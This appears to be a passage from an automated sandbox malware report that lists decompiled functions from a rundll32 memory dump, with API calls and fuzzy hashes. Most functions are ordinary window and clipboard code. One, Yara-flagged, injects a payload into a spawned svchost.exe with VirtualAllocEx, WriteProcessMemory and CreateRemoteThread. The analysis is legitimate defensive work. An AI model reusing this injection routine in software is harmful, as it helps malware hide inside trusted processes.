                          							}
                          							_v16 = _t348;
                          						} else {
                          							_t362 =  *((intOrPtr*)(_v24 + 0x48)) -  *(_v8 + 0x48);
                          							__eflags = _t362;
                          							_t363 = _t362 >> 1;
                          							if(_t362 < 0) {
                          								asm("adc eax, 0x0");
                          							}
                          							_v12 = _t363 +  *((intOrPtr*)(_v24 + 0x40));
                          							_t367 =  *((intOrPtr*)(_v24 + 0x4c)) -  *(_v8 + 0x4c);
                          							__eflags = _t367;
                          							_t368 = _t367 >> 1;
                          							if(_t367 < 0) {
                          								asm("adc eax, 0x0");
                          							}
                          							_v16 = _t368 +  *((intOrPtr*)(_v24 + 0x44));
                          						}
                          						__eflags = _v12;
                          						if(_v12 < 0) {
                          							__eflags = 0;
                          							_v12 = 0;
                          						}
                          						__eflags = _v16;
                          						if(_v16 < 0) {
                          							__eflags = 0;
                          							_v16 = 0;
                          						}
                          						_t395 = _v16;
                          						_t417 = _v12;
                          						 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
                          						_t355 = _v8;
                          						__eflags =  *((char*)(_t355 + 0x57));
                          						if( *((char*)(_t355 + 0x57)) != 0) {
                          							E02817918(_v8, _t395, _t417);
                          						}
                          					}
                          					L64:
                          					 *((char*)(_v8 + 0x230)) = 0;
                          					if( *((char*)(_v8 + 0x22f)) != 1) {
                          						ShowWindow(E02833F7C(_v8),  *(0x2863d00 + ( *(_v8 + 0x22b) & 0x000000ff) * 4));
                          					} else {
                          						if( *(_v8 + 0x22b) != 2) {
                          							ShowWindow(E02833F7C(_v8),  *(0x2863d00 + ( *(_v8 + 0x22b) & 0x000000ff) * 4));
                          							_t272 =  *(_v8 + 0x48) |  *(_v8 + 0x4c) << 0x00000010;
                          							__eflags = _t272;
                          							CallWindowProcA(0x27d6a34, E02833F7C(_v8), 5, 0, _t272);
                          							E0282D9B0();
                          						} else {
                          							_t283 = E02833F7C(_v8);
                          							_t284 =  *0x2865b58; // 0x41d1544
                          							_t145 = _t284 + 0x44; // 0x0
                          							SendMessageA( *( *_t145 + 0x254), 0x223, _t283, 0);
                          							ShowWindow(E02833F7C(_v8), 3);
                          						}
                          						_t278 =  *0x2865b58; // 0x41d1544
                          						_t159 = _t278 + 0x44; // 0x0
                          						SendMessageA( *( *_t159 + 0x254), 0x234, 0, 0);
                          					}
                          					goto L83;
                          				}
                          			}

                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: LoadString
                          • String ID:
                          • API String ID: 2948472770-0
                          • Opcode ID: da732fb6e2dc862afd31522ab96a398caa19574a3fee5730b99d4a7e7e430eb2
                          • Instruction ID: 409cb5ab0cf99f28b78b442e04e324da162edf86ecc9dbf920fd54f6a588b23f
                          • Opcode Fuzzy Hash: da732fb6e2dc862afd31522ab96a398caa19574a3fee5730b99d4a7e7e430eb2
                          • Instruction Fuzzy Hash: 1E02F97CA10249EFDB01DFA8DA98B9DBBF9AB08304F6444A4E504EB291D775EE40DF50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 75%
                          			E02834260(void* __eax) {
                          				void* _v28;
                          				struct _WINDOWPLACEMENT _v56;
                          				struct tagPOINT _v64;
                          				intOrPtr _v68;
                          				void* _t43;
                          				struct HWND__* _t45;
                          				struct tagPOINT* _t47;
                          
                          				_t47 =  &(_v64.y);
                          				_t43 = __eax;
                          				if(IsIconic( *(__eax + 0x180)) == 0) {
                          					GetWindowRect( *(_t43 + 0x180), _t47);
                          				} else {
                          					_v56.length = 0x2c;
                          					GetWindowPlacement( *(_t43 + 0x180),  &_v56);
                          					asm("movsd");
                          					asm("movsd");
                          					asm("movsd");
                          					asm("movsd");
                          				}
                          				if((GetWindowLongA( *(_t43 + 0x180), 0xfffffff0) & 0x40000000) != 0) {
                          					_t45 = GetWindowLongA( *(_t43 + 0x180), 0xfffffff8);
                          					if(_t45 != 0) {
                          						ScreenToClient(_t45, _t47);
                          						ScreenToClient(_t45,  &_v64);
                          					}
                          				}
                          				 *(_t43 + 0x40) = _t47->x;
                          				 *((intOrPtr*)(_t43 + 0x44)) = _v68;
                          				 *((intOrPtr*)(_t43 + 0x48)) = _v64.x - _t47->x;
                          				 *((intOrPtr*)(_t43 + 0x4c)) = _v64.y.x - _v68;
                          				return E0282CD7C(_t43);
                          			}

                          APIs
                          • IsIconic.USER32(?), ref: 0283426F
                          • GetWindowPlacement.USER32(?,0000002C), ref: 0283428C
                          • GetWindowRect.USER32(?), ref: 028342A5
                          • GetWindowLongA.USER32(?,000000F0), ref: 028342B3
                          • GetWindowLongA.USER32(?,000000F8), ref: 028342C8
                          • ScreenToClient.USER32(00000000), ref: 028342D5
                          • ScreenToClient.USER32(00000000,?), ref: 028342E0
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Window$ClientLongScreen$IconicPlacementRect
                          • String ID: ,
                          • API String ID: 2266315723-3772416878
                          • Opcode ID: b5862382137e1a3b3c6836192f3a670612fcd5fe1beae2114fa89947cdf3f193
                          • Instruction ID: b7d0c20d2f434f1715c4562a51ddd0e17f66881195d0f3e8e08505436f016a13
                          • Opcode Fuzzy Hash: b5862382137e1a3b3c6836192f3a670612fcd5fe1beae2114fa89947cdf3f193
                          • Instruction Fuzzy Hash: 10115E75505600AFCB42DFACD888A9B77EDBF49310F044928FD5CDB245DB31E9048BA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 91%
                          			E0282748C(intOrPtr __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
                          				intOrPtr _v8;
                          				struct HMENU__* _v12;
                          				signed int _v16;
                          				char _v17;
                          				intOrPtr _v24;
                          				int _v28;
                          				struct HDC__* _v32;
                          				intOrPtr _v36;
                          				intOrPtr _v40;
                          				intOrPtr _v44;
                          				intOrPtr* _v48;
                          				char _v52;
                          				intOrPtr _t137;
                          				signed int _t138;
                          				struct HWND__* _t144;
                          				signed int _t150;
                          				signed int _t151;
                          				intOrPtr* _t153;
                          				void* _t158;
                          				struct HMENU__* _t160;
                          				intOrPtr* _t165;
                          				void* _t173;
                          				signed int _t177;
                          				signed int _t181;
                          				void* _t182;
                          				void* _t214;
                          				void* _t252;
                          				signed int _t258;
                          				void* _t266;
                          				signed int _t272;
                          				signed int _t273;
                          				signed int _t275;
                          				signed int _t276;
                          				signed int _t278;
                          				signed int _t279;
                          				signed int _t281;
                          				signed int _t282;
                          				signed int _t284;
                          				signed int _t285;
                          				signed int _t287;
                          				signed int _t288;
                          				signed int _t291;
                          				signed int _t292;
                          				intOrPtr _t312;
                          				intOrPtr _t334;
                          				intOrPtr _t343;
                          				intOrPtr _t347;
                          				intOrPtr* _t354;
                          				signed int _t356;
                          				intOrPtr* _t357;
                          				intOrPtr* _t360;
                          				signed int _t368;
                          				signed int _t369;
                          				signed int _t370;
                          				signed int _t371;
                          				signed int _t372;
                          				signed int _t373;
                          				signed int _t374;
                          				intOrPtr* _t376;
                          				void* _t378;
                          				void* _t379;
                          				intOrPtr _t380;
                          				void* _t381;
                          
                          				_t378 = _t379;
                          				_t380 = _t379 + 0xffffffd0;
                          				_v52 = 0;
                          				_t376 = __edx;
                          				_v8 = __eax;
                          				_push(_t378);
                          				_push(0x28279bf);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t380;
                          				_t137 =  *__edx;
                          				_t381 = _t137 - 0x111;
                          				if(_t381 > 0) {
                          					_t138 = _t137 - 0x117;
                          					__eflags = _t138;
                          					if(_t138 == 0) {
                          						_t272 =  *((intOrPtr*)(_v8 + 8)) - 1;
                          						__eflags = _t272;
                          						if(_t272 < 0) {
                          							goto L67;
                          						} else {
                          							_t273 = _t272 + 1;
                          							_t368 = 0;
                          							__eflags = 0;
                          							while(1) {
                          								_t150 = E02826838(E027EB1E0(_v8, _t368),  *(_t376 + 4), __eflags);
                          								__eflags = _t150;
                          								if(_t150 != 0) {
                          									goto L68;
                          								}
                          								_t368 = _t368 + 1;
                          								_t273 = _t273 - 1;
                          								__eflags = _t273;
                          								if(_t273 != 0) {
                          									continue;
                          								} else {
                          									goto L67;
                          								}
                          								goto L68;
                          							}
                          						}
                          					} else {
                          						_t151 = _t138 - 8;
                          						__eflags = _t151;
                          						if(_t151 == 0) {
                          							_v17 = 0;
                          							__eflags =  *(__edx + 6) & 0x00000010;
                          							if(( *(__edx + 6) & 0x00000010) != 0) {
                          								_v17 = 1;
                          							}
                          							_t275 =  *((intOrPtr*)(_v8 + 8)) - 1;
                          							__eflags = _t275;
                          							if(__eflags < 0) {
                          								L32:
                          								_t153 =  *0x28645d4; // 0x2865b58
                          								E0281EFF4( *_t153, 0, __eflags);
                          								goto L67;
                          							} else {
                          								_t276 = _t275 + 1;
                          								_t369 = 0;
                          								__eflags = 0;
                          								while(1) {
                          									__eflags = _v17 - 1;
                          									if(_v17 != 1) {
                          										_v12 =  *(_t376 + 4) & 0x0000ffff;
                          									} else {
                          										_t160 =  *(_t376 + 8);
                          										__eflags = _t160;
                          										if(_t160 == 0) {
                          											_v12 = 0xffffffff;
                          										} else {
                          											_v12 = GetSubMenu(_t160,  *(_t376 + 4) & 0x0000ffff);
                          										}
                          									}
                          									_t158 = E027EB1E0(_v8, _t369);
                          									_t296 = _v17;
                          									_v16 = E0282677C(_t158, _v17, _v12);
                          									__eflags = _v16;
                          									if(__eflags != 0) {
                          										break;
                          									}
                          									_t369 = _t369 + 1;
                          									_t276 = _t276 - 1;
                          									__eflags = _t276;
                          									if(__eflags != 0) {
                          										continue;
                          									} else {
                          										goto L32;
                          									}
                          									goto L68;
                          								}
                          								E0282A834( *((intOrPtr*)(_v16 + 0x58)), _t296,  &_v52, __eflags);
                          								_t165 =  *0x28645d4; // 0x2865b58
                          								E0281EFF4( *_t165, _v52, __eflags);
                          							}
                          						} else {
                          							__eflags = _t151 == 1;
                          							if(_t151 == 1) {
                          								_t278 =  *((intOrPtr*)(_v8 + 8)) - 1;
                          								__eflags = _t278;
                          								if(_t278 < 0) {
                          									goto L67;
                          								} else {
                          									_t279 = _t278 + 1;
                          									_t370 = 0;
                          									__eflags = 0;
                          									while(1) {
                          										_v48 = E027EB1E0(_v8, _t370);
                          										_t173 =  *((intOrPtr*)( *_v48 + 0x34))();
                          										__eflags = _t173 -  *(_t376 + 8);
                          										if(_t173 ==  *(_t376 + 8)) {
                          											break;
                          										}
                          										_t177 = E0282677C(_v48, 1,  *(_t376 + 8));
                          										__eflags = _t177;
                          										if(_t177 == 0) {
                          											_t370 = _t370 + 1;
                          											_t279 = _t279 - 1;
                          											__eflags = _t279;
                          											if(_t279 != 0) {
                          												continue;
                          											} else {
                          												goto L67;
                          											}
                          										} else {
                          											break;
                          										}
                          										goto L68;
                          									}
                          									E0282707C(_v48, _t376);
                          								}
                          							} else {
                          								goto L67;
                          							}
                          						}
                          					}
                          					goto L68;
                          				} else {
                          					if(_t381 == 0) {
                          						_t281 =  *((intOrPtr*)(_v8 + 8)) - 1;
                          						__eflags = _t281;
                          						if(_t281 < 0) {
                          							goto L67;
                          						} else {
                          							_t282 = _t281 + 1;
                          							_t371 = 0;
                          							__eflags = 0;
                          							while(1) {
                          								E027EB1E0(_v8, _t371);
                          								_t181 = E0282681C( *(_t376 + 4), __eflags);
                          								__eflags = _t181;
                          								if(_t181 != 0) {
                          									goto L68;
                          								}
                          								_t371 = _t371 + 1;
                          								_t282 = _t282 - 1;
                          								__eflags = _t282;
                          								if(_t282 != 0) {
                          									continue;
                          								} else {
                          									goto L67;
                          								}
                          								goto L68;
                          							}
                          						}
                          						goto L68;
                          					} else {
                          						_t182 = _t137 - 0x2b;
                          						if(_t182 == 0) {
                          							_v40 =  *((intOrPtr*)(__edx + 8));
                          							_t284 =  *((intOrPtr*)(_v8 + 8)) - 1;
                          							__eflags = _t284;
                          							if(_t284 < 0) {
                          								goto L67;
                          							} else {
                          								_t285 = _t284 + 1;
                          								_t372 = 0;
                          								__eflags = 0;
                          								while(1) {
                          									_v16 = E0282677C(E027EB1E0(_v8, _t372), 0,  *((intOrPtr*)(_v40 + 8)));
                          									__eflags = _v16;
                          									if(_v16 != 0) {
                          										break;
                          									}
                          									_t372 = _t372 + 1;
                          									_t285 = _t285 - 1;
                          									__eflags = _t285;
                          									if(_t285 != 0) {
                          										continue;
                          									} else {
                          										goto L67;
                          									}
                          									goto L69;
                          								}
                          								_v24 = E027F7E84(0, 1);
                          								_push(_t378);
                          								_push(0x28277f2);
                          								_push( *[fs:eax]);
                          								 *[fs:eax] = _t380;
                          								_v28 = SaveDC( *(_v40 + 0x18));
                          								_push(_t378);
                          								_push(0x28277d5);
                          								_push( *[fs:eax]);
                          								 *[fs:eax] = _t380;
                          								E027F856C(_v24,  *(_v40 + 0x18));
                          								E027F83E8(_v24);
                          								E02827C64(_v16, _v40 + 0x1c, _v24,  *((intOrPtr*)(_v40 + 0x10)));
                          								_pop(_t334);
                          								 *[fs:eax] = _t334;
                          								_push(0x28277dc);
                          								__eflags = 0;
                          								E027F856C(_v24, 0);
                          								return RestoreDC( *(_v40 + 0x18), _v28);
                          							}
                          						} else {
                          							_t214 = _t182 - 1;
                          							if(_t214 == 0) {
                          								_v44 =  *((intOrPtr*)(__edx + 8));
                          								_t287 =  *((intOrPtr*)(_v8 + 8)) - 1;
                          								__eflags = _t287;
                          								if(_t287 < 0) {
                          									goto L67;
                          								} else {
                          									_t288 = _t287 + 1;
                          									_t373 = 0;
                          									__eflags = 0;
                          									while(1) {
                          										_v16 = E0282677C(E027EB1E0(_v8, _t373), 0,  *((intOrPtr*)(_v44 + 8)));
                          										__eflags = _v16;
                          										if(_v16 != 0) {
                          											break;
                          										}
                          										_t373 = _t373 + 1;
                          										_t288 = _t288 - 1;
                          										__eflags = _t288;
                          										if(_t288 != 0) {
                          											continue;
                          										} else {
                          											goto L67;
                          										}
                          										goto L69;
                          									}
                          									_v32 = GetWindowDC( *(_v8 + 0x10));
                          									 *[fs:eax] = _t380;
                          									_v24 = E027F7E84(0, 1);
                          									 *[fs:eax] = _t380;
                          									_v28 = SaveDC(_v32);
                          									 *[fs:eax] = _t380;
                          									E027F856C(_v24, _v32);
                          									E027F83E8(_v24);
                          									 *((intOrPtr*)( *_v16 + 0x38))(_v44 + 0x10,  *[fs:eax], 0x28278f3, _t378,  *[fs:eax], 0x2827910, _t378,  *[fs:eax], 0x2827935, _t378);
                          									_pop(_t343);
                          									 *[fs:eax] = _t343;
                          									_push(0x28278fa);
                          									__eflags = 0;
                          									E027F856C(_v24, 0);
                          									return RestoreDC(_v32, _v28);
                          								}
                          							} else {
                          								if(_t214 == 0x27) {
                          									_v36 =  *((intOrPtr*)(__edx + 8));
                          									_t291 =  *((intOrPtr*)(_v8 + 8)) - 1;
                          									__eflags = _t291;
                          									if(_t291 < 0) {
                          										goto L67;
                          									} else {
                          										_t292 = _t291 + 1;
                          										_t374 = 0;
                          										__eflags = 0;
                          										while(1) {
                          											_t252 =  *((intOrPtr*)( *((intOrPtr*)(E027EB1E0(_v8, _t374))) + 0x34))();
                          											_t347 = _v36;
                          											__eflags = _t252 -  *((intOrPtr*)(_t347 + 0xc));
                          											if(_t252 !=  *((intOrPtr*)(_t347 + 0xc))) {
                          												_v16 = E0282677C(E027EB1E0(_v8, _t374), 1,  *((intOrPtr*)(_v36 + 0xc)));
                          											} else {
                          												_v16 =  *((intOrPtr*)(E027EB1E0(_v8, _t374) + 0x34));
                          											}
                          											__eflags = _v16;
                          											if(_v16 != 0) {
                          												break;
                          											}
                          											_t374 = _t374 + 1;
                          											_t292 = _t292 - 1;
                          											__eflags = _t292;
                          											if(_t292 != 0) {
                          												continue;
                          											} else {
                          												goto L67;
                          											}
                          											goto L68;
                          										}
                          										_t258 = E028267AC(E027EB1E0(_v8, _t374), 1,  *((intOrPtr*)(_v36 + 8)));
                          										__eflags = _t258;
                          										if(_t258 == 0) {
                          											_t266 = E027EB1E0(_v8, _t374);
                          											__eflags = 0;
                          											_t258 = E028267AC(_t266, 0,  *((intOrPtr*)(_v36 + 0xc)));
                          										}
                          										_t354 =  *0x2864774; // 0x2865b5c
                          										_t56 =  *_t354 + 0x6c; // 0x0
                          										_t356 =  *_t56;
                          										__eflags = _t356;
                          										if(_t356 != 0) {
                          											__eflags = _t258;
                          											if(_t258 == 0) {
                          												_t258 =  *(_t356 + 0x158);
                          											}
                          											__eflags =  *(_t356 + 0x228) & 0x00000008;
                          											if(( *(_t356 + 0x228) & 0x00000008) == 0) {
                          												_t357 =  *0x28645d4; // 0x2865b58
                          												E0281EBC0( *_t357, _t292, _t258);
                          											} else {
                          												_t360 =  *0x28645d4; // 0x2865b58
                          												E0281EC38( *_t360, _t258, 8);
                          											}
                          										}
                          									}
                          								} else {
                          									L67:
                          									_push( *(_t376 + 8));
                          									_push( *(_t376 + 4));
                          									_push( *_t376);
                          									_t144 =  *(_v8 + 0x10);
                          									_push(_t144);
                          									L027D6A3C();
                          									 *(_t376 + 0xc) = _t144;
                          								}
                          								L68:
                          								_pop(_t312);
                          								 *[fs:eax] = _t312;
                          								_push(0x28279c6);
                          								return E027D40E8( &_v52);
                          							}
                          						}
                          					}
                          				}
                          				L69:
                          			}

                          APIs
                          • SaveDC.GDI32(?), ref: 0282775B
                          • RestoreDC.GDI32(?,?), ref: 028277CF
                          • GetWindowDC.USER32(?,00000000,028279BF), ref: 02827849
                          • SaveDC.GDI32(?), ref: 02827880
                          • RestoreDC.GDI32(?,?), ref: 028278ED
                          • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,028279BF), ref: 028279A1
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: RestoreSaveWindow$NtdllProc_
                          • String ID:
                          • API String ID: 1346906915-0
                          • Opcode ID: a54e4be7b6e0b856171f02d4727e410607d1cb3e39c5d323b6dccf5cad96f2d9
                          • Instruction ID: d7951693544f32c9712fc4c384f68c576aacbce8ae785175e755c258815c93b0
                          • Opcode Fuzzy Hash: a54e4be7b6e0b856171f02d4727e410607d1cb3e39c5d323b6dccf5cad96f2d9
                          • Instruction Fuzzy Hash: 92E1263CA042199FDB11DFAAC9849AEF7FAFB49304B2186A5E405E7360C734AD85CF51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 87%
                          			E042D3880(void* _a4, long _a8, intOrPtr _a12, intOrPtr _a16) {
                          				void* _v8;
                          				void* _v12;
                          				void* _v16;
                          				void* _v20;
                          				void* _v24;
                          				void* _v28;
                          				char _v32;
                          				long _v36;
                          
                          				if(_a12 == 0) {
                          					_v8 = VirtualAlloc(0, _a8, 0x3000, 0x40);
                          					if(_v8 == 0) {
                          						L14:
                          						return 0;
                          					}
                          					E042D1450(_v8, _a4, _a8);
                          					if(_a16 == 0) {
                          						_v28 = _v8;
                          						_v28();
                          						return 1;
                          					}
                          					_v24 = CreateThread(0, 0, E042D39E0, _v8, 0, 0);
                          					if(_v24 == 0) {
                          						goto L14;
                          					}
                          					CloseHandle(_v24);
                          					return 1;
                          				}
                          				if(E042D2C40( &_v16,  &_v32) != 0) {
                          					_v12 = VirtualAllocEx(_v16, 0, _a8, 0x3000, 0x40);
                          					if(_v12 == 0 || WriteProcessMemory(_v16, _v12, _a4, _a8, 0) == 0) {
                          						L7:
                          						goto L14;
                          					} else {
                          						_v20 = CreateRemoteThread(_v16, 0, 0, _v12, 0, 0,  &_v36);
                          						if(_v20 == 0) {
                          							goto L7;
                          						}
                          						CloseHandle(_v20);
                          						return 1;
                          					}
                          				}
                          				return 0;
                          			}

                          APIs
                          • VirtualAllocEx.KERNEL32(00500000,00000000,00500000,00003000,00000040,?,?,?,?,?,042D1FB7), ref: 042D38BC
                          • WriteProcessMemory.KERNEL32(00500000,00000000,00000000,00500000,00000000,?,?,?,?,?,042D1FB7), ref: 042D38DD
                          • CreateRemoteThread.KERNEL32(00500000,00000000,00000000,00000000,00000000,00000000,?), ref: 042D38FB
                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,042D1FB7), ref: 042D390E
                          • VirtualAlloc.KERNEL32(00000000,00500000,00003000,00000040,?,?,?,042D1FB7), ref: 042D392A
                          • CreateThread.KERNEL32(00000000,00000000,042D39E0,00000000,00000000,00000000), ref: 042D3964
                          • CloseHandle.KERNEL32(00000000), ref: 042D3977
                            • Part of subcall function 042D2C40: GetEnvironmentVariableA.KERNEL32(SystemRoot,?,00000104), ref: 042D2C71
                            • Part of subcall function 042D2C40: lstrcatA.KERNEL32(?,\System32\svchost.exe), ref: 042D2C83
                            • Part of subcall function 042D2C40: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000424,00000000,00000000,00000044,?), ref: 042D2CA9
                          Memory Dump Source
                          • Source File: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_42d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Create$AllocCloseHandleProcessThreadVirtual$EnvironmentMemoryRemoteVariableWritelstrcat
                          • String ID:
                          • API String ID: 2742758278-0
                          • Opcode ID: 7988e2d117c1f50fc4d748b8b23e5dcd3423774fc7ee508de15149581da7d1eb
                          • Instruction ID: d7efce650a9d2f9964a28f439525f6017daf3ad7d3889c158108f5ef2a9e86d2
                          • Opcode Fuzzy Hash: 7988e2d117c1f50fc4d748b8b23e5dcd3423774fc7ee508de15149581da7d1eb
                          • Instruction Fuzzy Hash: 03315075B14209FBDB14DFA4D849FEE77B8EB48701F108518FA05A7284E3B5AA40CB66
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 38%
                          			E0281DFFC(int __eax) {
                          				int _v8;
                          				void* __ecx;
                          				int _t45;
                          				intOrPtr* _t53;
                          				signed int _t56;
                          				intOrPtr* _t57;
                          				int _t60;
                          				intOrPtr _t67;
                          				intOrPtr _t70;
                          				void* _t94;
                          				int _t102;
                          
                          				_v8 = __eax;
                          				_t45 = IsIconic( *(_v8 + 0x30));
                          				if(_t45 != 0) {
                          					SetActiveWindow( *(_v8 + 0x30));
                          					if( *((intOrPtr*)(_v8 + 0x44)) == 0 ||  *((char*)(_v8 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_v8 + 0x44)) + 0x57)) == 0) {
                          						L6:
                          						E0281CC34( *(_v8 + 0x30), 9);
                          					} else {
                          						_t102 = IsWindowEnabled(E02833F7C( *((intOrPtr*)(_v8 + 0x44))));
                          						if(_t102 == 0) {
                          							goto L6;
                          						} else {
                          							_push(0);
                          							_push(0xf120);
                          							_push(0x112);
                          							_push( *(_v8 + 0x30));
                          							L027D6A3C();
                          						}
                          					}
                          					_t53 =  *0x2864444; // 0x2865890
                          					_t56 =  *((intOrPtr*)( *_t53))(1, 0, 0, 0x40) >> 1;
                          					if(_t102 < 0) {
                          						asm("adc eax, 0x0");
                          					}
                          					_t57 =  *0x2864444; // 0x2865890
                          					_t60 =  *((intOrPtr*)( *_t57))(0, _t56) >> 1;
                          					if(_t102 < 0) {
                          						asm("adc eax, 0x0");
                          					}
                          					SetWindowPos( *(_v8 + 0x30), 0, _t60, ??, ??, ??, ??);
                          					if( *((intOrPtr*)(_v8 + 0x44)) != 0 &&  *((char*)( *((intOrPtr*)(_v8 + 0x44)) + 0x22b)) == 1 &&  *((char*)( *((intOrPtr*)(_v8 + 0x44)) + 0x57)) == 0) {
                          						E028178BC( *((intOrPtr*)(_v8 + 0x44)), 0);
                          						E0281A51C( *((intOrPtr*)(_v8 + 0x44)));
                          					}
                          					E0281D530(_v8, _t94);
                          					_t67 =  *0x2865b5c; // 0x41d1150
                          					if( *((intOrPtr*)(_t67 + 0x64)) != 0) {
                          						_t70 =  *0x2865b5c; // 0x41d1150
                          						_t35 = _t70 + 0x64; // 0x0
                          						SetFocus(E02833F7C( *_t35));
                          					}
                          					_t45 = _v8;
                          					if( *((short*)(_t45 + 0x122)) != 0) {
                          						return  *((intOrPtr*)(_v8 + 0x120))();
                          					}
                          				}
                          				return _t45;
                          			}















                          APIs
                          • IsIconic.USER32(?), ref: 0281E00B
                          • SetActiveWindow.USER32(?,?,?,?,?,0281D998,00000000,0281DE90), ref: 0281E01F
                          • IsWindowEnabled.USER32(00000000), ref: 0281E04E
                          • NtdllDefWindowProc_A.USER32(?,00000112,0000F120,00000000,00000000,?,?,?,?,?,0281D998,00000000,0281DE90), ref: 0281E06A
                          • SetWindowPos.USER32(?,00000000,00000000,?,?,?,0281D998,00000000,0281DE90), ref: 0281E0B6
                          • SetFocus.USER32(00000000,?,00000000,00000000,?,?,?,0281D998,00000000,0281DE90), ref: 0281E118
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Window$ActiveEnabledFocusIconicNtdllProc_
                          • String ID:
                          • API String ID: 3996302123-0
                          • Opcode ID: 8d972900fa4bb88af96fb4a9fe519991199c08c651ae88206742805a040ed78b
                          • Instruction ID: ca103089319c2a4c31fa946c9e329733f20741829863e5c444f92a85d76522d7
                          • Opcode Fuzzy Hash: 8d972900fa4bb88af96fb4a9fe519991199c08c651ae88206742805a040ed78b
                          • Instruction Fuzzy Hash: A641A678A00144EFDB15EBA9DA89FA977FABB04304F590094E904DB2E2D775EE40DB14
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 45%
                          			E028024DC(void* __ebx, char __edx, void* __edi, void* __esi) {
                          				char _v8;
                          				void* _v12;
                          				void* _t32;
                          				intOrPtr _t42;
                          				void* _t45;
                          				intOrPtr _t50;
                          				intOrPtr _t52;
                          				void* _t56;
                          				void* _t57;
                          				intOrPtr _t58;
                          
                          				_t56 = _t57;
                          				_t58 = _t57 + 0xfffffff8;
                          				_v8 = __edx;
                          				E027D4598(_v8);
                          				_push(_t56);
                          				_push(0x280260a);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t58;
                          				if(OpenClipboard(0) == 0) {
                          					_t42 =  *0x2864324; // 0x27f55cc
                          					E027DBC80(_t42, 1);
                          					E027D3A9C();
                          					_pop(_t50);
                          					 *[fs:eax] = _t50;
                          					_push(0x2802611);
                          					return E027D40E8( &_v8);
                          				} else {
                          					_push(_t56);
                          					_push(0x28025d6);
                          					_push( *[fs:eax]);
                          					 *[fs:eax] = _t58;
                          					_v12 = GlobalAlloc(0x2002, E027D43A8(_v8) + 1);
                          					_push(_t56);
                          					_push(0x28025ab);
                          					_push( *[fs:eax]);
                          					 *[fs:eax] = _t58;
                          					_t26 = _v12;
                          					GlobalFix(_v12);
                          					_push(_t56);
                          					_push(0x280259a);
                          					_push( *[fs:eax]);
                          					 *[fs:eax] = _t58;
                          					_push(E027D43A8(_v8) + 1);
                          					_t32 = E027D45A8(_v8);
                          					_pop(_t45);
                          					E027D2978(_t32, _t45, _t26);
                          					EmptyClipboard();
                          					SetClipboardData(1, _v12);
                          					_pop(_t52);
                          					 *[fs:eax] = _t52;
                          					_push(0x28025a1);
                          					return GlobalUnWire(_v12);
                          				}
                          			}














                          APIs
                          • OpenClipboard.USER32(00000000), ref: 02802500
                          • GlobalAlloc.KERNEL32(00002002,00000001,00000000,028025D6,?,00000000,0280260A), ref: 0280252A
                          • GlobalFix.KERNEL32(?), ref: 02802544
                          • EmptyClipboard.USER32 ref: 02802573
                          • SetClipboardData.USER32(00000001,?), ref: 0280257E
                          • GlobalUnWire.KERNEL32(?), ref: 02802594
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
